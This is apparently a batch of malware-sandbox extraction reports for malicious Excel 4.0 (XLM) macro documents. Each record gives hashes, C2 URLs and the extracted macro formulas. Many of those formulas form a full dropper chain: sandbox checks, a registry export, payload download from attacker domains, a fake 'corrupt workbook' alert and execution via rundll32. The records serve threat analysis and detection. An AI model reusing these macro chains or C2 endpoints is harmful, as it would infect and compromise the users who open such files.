,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"596533123db4e766d19c7b039f9b1885f0a6eaf216b8deee12541ef2d803b6a3"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"596533123db4e766d19c7b039f9b1885f0a6eaf216b8deee12541ef2d803b6a3","filesize":212992,"md5":"3215535a4b0b03e3ada23272b4994856","sha1":"eee5e5986841b1d12d0afaf8e15d6fdf93248be3","sha256":"596533123db4e766d19c7b039f9b1885f0a6eaf216b8deee12541ef2d803b6a3","sha512":"2cc9e1dedd2803b78fdc9e9079e1f76236fcccf1983107ec4deb421f390d01b9a470a7bb03cb35c5ab5c996f8d4e4efb2cba3b4b3e0a8b0886adf39825e8b8d9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"596533123db4e766d19c7b039f9b1885f0a6eaf216b8deee12541ef2d803b6a3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bwz5WWaHB4\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5977556565b9a4e617459b5e4ced8a44fcb630de60fa9744f01d50b129b23032"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"5977556565b9a4e617459b5e4ced8a44fcb630de60fa9744f01d50b129b23032","filesize":147968,"md5":"570cf6877558424aa86b3b74fd2e795f","sha1":"5fc8a73e474404b9a66a91d9e66af2007c911e7c","sha256":"5977556565b9a4e617459b5e4ced8a44fcb630de60fa9744f01d50b129b23032","sha512":"993fcb3096f1182d278a680f45a221cf2d2f1072546b0fa4988a2c3d361e31303ab816cafc08dee3cf4c73630badc6bc17c3559ff75364feb3496db177c1ca20","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5977556565b9a4e617459b5e4ced8a44fcb630de60fa9744f01d50b129b23032.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"JHD62OSTTP\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5984497bcd8106a872a26c45dac446744b45fbffce51cd87cfbe42fa3fd5a1ee"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"5984497bcd8106a872a26c45dac446744b45fbffce51cd87cfbe42fa3fd5a1ee","filesize":209920,"md5":"8c89f86d944f0c69c7cde03167e12cb1","sha1":"23d9fed08c224a18aa09e10f1326f8387fa2c300","sha256":"5984497bcd8106a872a26c45dac446744b45fbffce51cd87cfbe42fa3fd5a1ee","sha512":"2ababe3f4b87238e86288556c514d6c465f8ccc99ebd60ca71cc1d19e58387a8ea95b3644794f5be6946e1a7cb0bd1e4972050e2343cf25548c315682fdd4b1d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5984497bcd8106a872a26c45dac446744b45fbffce51cd87cfbe42fa3fd5a1ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9TA7BFdxRv\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"598a701dd2901fbaf6d68dbd8257c809d394322253f90d1877aa50c10d32b836"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"598a701dd2901fbaf6d68dbd8257c809d394322253f90d1877aa50c10d32b836","filesize":167936,"md5":"545e354e076cf1884b0f272a4999ab83","sha1":"a23deb0d46cf542b547decec93100b7ffd62b28b","sha256":"598a701dd2901fbaf6d68dbd8257c809d394322253f90d1877aa50c10d32b836","sha512":"e93285bbe0c7d64c38270dba4e53ee7e02eb62b83941d5a027436e3e0c8d63d3110f668b2b4817552e0f5d940a0596cee90cc2d12014b32ea0748897a8473ea4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"598a701dd2901fbaf6d68dbd8257c809d394322253f90d1877aa50c10d32b836.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"py721GiQ90\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59932203641a64009f624dafbbb8d705423d94af1570048fe153f257b6d3ed73"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"59932203641a64009f624dafbbb8d705423d94af1570048fe153f257b6d3ed73","filesize":112640,"md5":"6a3ee4869a11fe1cea276ab089fdbe5e","sha1":"8849f1fe585954eee5668417e9a27f62b482aeef","sha256":"59932203641a64009f624dafbbb8d705423d94af1570048fe153f257b6d3ed73","sha512":"1fce0b13b6ec0fb20b2136f2a32e9a624bb807d8d7c45d85d425392744a2192a9b81a9a025f4fb3501b9181032314832a800bb2164b2b46fa38fd42797d94a00","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59932203641a64009f624dafbbb8d705423d94af1570048fe153f257b6d3ed73.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5998f3a55b60d6ff14f11163a9d603edb3d53a0e8eca6eceec6ca6634b5606f4"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"5998f3a55b60d6ff14f11163a9d603edb3d53a0e8eca6eceec6ca6634b5606f4","filesize":226304,"md5":"5e3975f83d2cdff142a95677a23585c8","sha1":"9bb1c547da4571e55ce3aa0474680238b55b7503","sha256":"5998f3a55b60d6ff14f11163a9d603edb3d53a0e8eca6eceec6ca6634b5606f4","sha512":"0ca5836058b19dbd5c748d7d4b3247f99309f2ee5436e2ee17044e36122eee3857abea887f7078202f4691558796c719945adfeb6fc5f31815a1145eeb4725b3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5998f3a55b60d6ff14f11163a9d603edb3d53a0e8eca6eceec6ca6634b5606f4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3zKp55Qw74\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59a2802d7b46db81f94e4226e09ad9a743f1a6a9164d8f78151545072efc08b1"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"59a2802d7b46db81f94e4226e09ad9a743f1a6a9164d8f78151545072efc08b1","filesize":167936,"md5":"4e85871b00930084a2e4b1c4bb2cb2a2","sha1":"b8047d76d5ce464bf255e86a882802e4cee6d6b8","sha256":"59a2802d7b46db81f94e4226e09ad9a743f1a6a9164d8f78151545072efc08b1","sha512":"df93ce34fc53f8850da2da60cf59fe9322d684faeeca6bb611284c6e48b0d8cb1ce233900b9e1c2a5e14945c430e671db1cd885947ef89870b207ad7b62bac33","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59a2802d7b46db81f94e4226e09ad9a743f1a6a9164d8f78151545072efc08b1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gDcXZdufSH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59a3b366ddef43c80f9b62e264947bbcd66061b6c9023d31de1d479645a69561"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"59a3b366ddef43c80f9b62e264947bbcd66061b6c9023d31de1d479645a69561","filesize":167936,"md5":"cebee5359da9dde1da01f75082c772e2","sha1":"85659eb6e140004f98e10f595e89fa5c408dc53d","sha256":"59a3b366ddef43c80f9b62e264947bbcd66061b6c9023d31de1d479645a69561","sha512":"9b582a5535208642dbd9932ea3e5fb1f07c1db4d1f39901c4953a75900b9f2e7ffbe639847a1cd4d38f32c8250cc7c8c2330129cfcc7e5b6680b6b1dfe1f8310","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59a3b366ddef43c80f9b62e264947bbcd66061b6c9023d31de1d479645a69561.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HyhH8UFvYf\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59a62287ef91009888154fd992e000c8ca28d48b3f0b2fad5636f5d6797f7061"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"59a62287ef91009888154fd992e000c8ca28d48b3f0b2fad5636f5d6797f7061","filesize":104448,"md5":"461424572d941c5a31135ee59a1e9dd7","sha1":"9ccaec34aa753c3eaa075fc389609ff4a0b305ac","sha256":"59a62287ef91009888154fd992e000c8ca28d48b3f0b2fad5636f5d6797f7061","sha512":"2a1350321fb0cb52e35053f21c948f6e60f8622c9d7a96e3fdabd573584883029250242214951b75f61125ddbbdf4bfedcc8d4cfff865cf77d1b0ebeb95eeb71","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59a62287ef91009888154fd992e000c8ca28d48b3f0b2fad5636f5d6797f7061.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"s2czB0qrWt\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59b033c256e8f3850b9356d9da272824d2b7ac214de8ce47fd10e92acb971364"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"59b033c256e8f3850b9356d9da272824d2b7ac214de8ce47fd10e92acb971364","filesize":168960,"md5":"30df811809ae77111841c4a12a397a61","sha1":"16fc989ba38e9a634460951f02c1c90263ca8a6c","sha256":"59b033c256e8f3850b9356d9da272824d2b7ac214de8ce47fd10e92acb971364","sha512":"eb3e9b42317f2c074c1b93e2d27eb9858b18606339e30cfe116a4194e31cefc93dad6215f0cf11ba407cf7fee7f706f259db8b7d35e81ebf8bdb9968c735ad96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59b033c256e8f3850b9356d9da272824d2b7ac214de8ce47fd10e92acb971364.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"waq0ALG9Ag\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59e528de8d47e0119ae7fc1bb5140d63acf8afa2f0fa731f09457d0e49304b6e"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"59e528de8d47e0119ae7fc1bb5140d63acf8afa2f0fa731f09457d0e49304b6e","filesize":160768,"md5":"9860737504054b387fc42a9ee4adebe4","sha1":"4b4d433088a9d68f2497ecf020d8a226642914cc","sha256":"59e528de8d47e0119ae7fc1bb5140d63acf8afa2f0fa731f09457d0e49304b6e","sha512":"8c1ad0f1ebee1ee4037a95710332a67f5a6640f62788c540a533722f9bee33fde47c5ab54e95573e726a1aa53746f776664ab84853bb7a2d81cf0390dcd7bbb8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59e528de8d47e0119ae7fc1bb5140d63acf8afa2f0fa731f09457d0e49304b6e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7AdzgTBIZJ\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59e9f8f968aac469cf59822e1f45a02064f4880c32dc5f68b5d5c17ad1ecccd0"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"59e9f8f968aac469cf59822e1f45a02064f4880c32dc5f68b5d5c17ad1ecccd0","filesize":167936,"md5":"f7dea7b11c6b7bdae1c8b690e8920676","sha1":"ad03f5d730368b79672866d00858a651860b070d","sha256":"59e9f8f968aac469cf59822e1f45a02064f4880c32dc5f68b5d5c17ad1ecccd0","sha512":"b99ce3954c29d3f3dd706cf8a8be658aeebcbad1792afc4ae6b58225b28d61e66a35a44893d6593ddd357a606a6b75c3855063a70f4b33fc6919e729fc92a487","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59e9f8f968aac469cf59822e1f45a02064f4880c32dc5f68b5d5c17ad1ecccd0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cBBhYvoc3N\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59fb9a9a7a5882bf8f7711603c27a7e3a60ca543262c37ff03702226b85d11a5"},"analysis":{"reported":"2020-04-09T16:16:27Z","score":10},"files":[{"filename":"59fb9a9a7a5882bf8f7711603c27a7e3a60ca543262c37ff03702226b85d11a5","filesize":185344,"md5":"966cda73e9b80f3f0a80f224da957652","sha1":"ad9ed198cccdecf4cd3e60d7a0f832eaa8fb1cd8","sha256":"59fb9a9a7a5882bf8f7711603c27a7e3a60ca543262c37ff03702226b85d11a5","sha512":"71baa34ff1d8210623d89d9ee19905d0407abfbea22a03e5a0bf6d9035c800985d4ac32de7253b261f5d74c616cf12ecee60de1abda14d35bd4a92466889fbe8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59fb9a9a7a5882bf8f7711603c27a7e3a60ca543262c37ff03702226b85d11a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a0a0ee3433e04212fed7cfd182d8a8742fdf6ff7e8e63110e74331519acc3a4"},"analysis":{"reported":"2020-04-09T16:16:27Z","score":10},"files":[{"filename":"5a0a0ee3433e04212fed7cfd182d8a8742fdf6ff7e8e63110e74331519acc3a4","filesize":142848,"md5":"a05c30d90d2e9aeb78e8fc14c27375b2","sha1":"a84e0fd0f9478fe1d285d4451f20bab75bedaef0","sha256":"5a0a0ee3433e04212fed7cfd182d8a8742fdf6ff7e8e63110e74331519acc3a4","sha512":"d837dc696e0e0a2006a8ace9edcc54867042a9d89ced03b142f14ab315d53f18b411cbe6ae02b5168baf63cc6b90a07da681ca2665f17adaf1df9cdfda34bc1a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a0a0ee3433e04212fed7cfd182d8a8742fdf6ff7e8e63110e74331519acc3a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"DSnjrnskqG\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a142de5f730bfc7778637a12744de52c896d858d8f1e2b8c10e07f3ed6c9b78"},"analysis":{"reported":"2020-04-09T16:16:27Z","score":10},"files":[{"filename":"5a142de5f730bfc7778637a12744de52c896d858d8f1e2b8c10e07f3ed6c9b78","filesize":214528,"md5":"8e40b530f216cdb9f0d6eea8c412a4de","sha1":"f8359d45a90aec559a9eb2e230301ba097bf6966","sha256":"5a142de5f730bfc7778637a12744de52c896d858d8f1e2b8c10e07f3ed6c9b78","sha512":"a5838c7147f85dab42eba3a4b9d8d4872bbb0460b66dc79c749fe03e9a800ba0c741eccd15d2ea4599c911b4a992ad0cd821b0889173b20a216db21f4e96f22e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a142de5f730bfc7778637a12744de52c896d858d8f1e2b8c10e07f3ed6c9b78.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Vr30c20Hne\",TRUE)\nGOTO(R$0C$18)"}}}]}
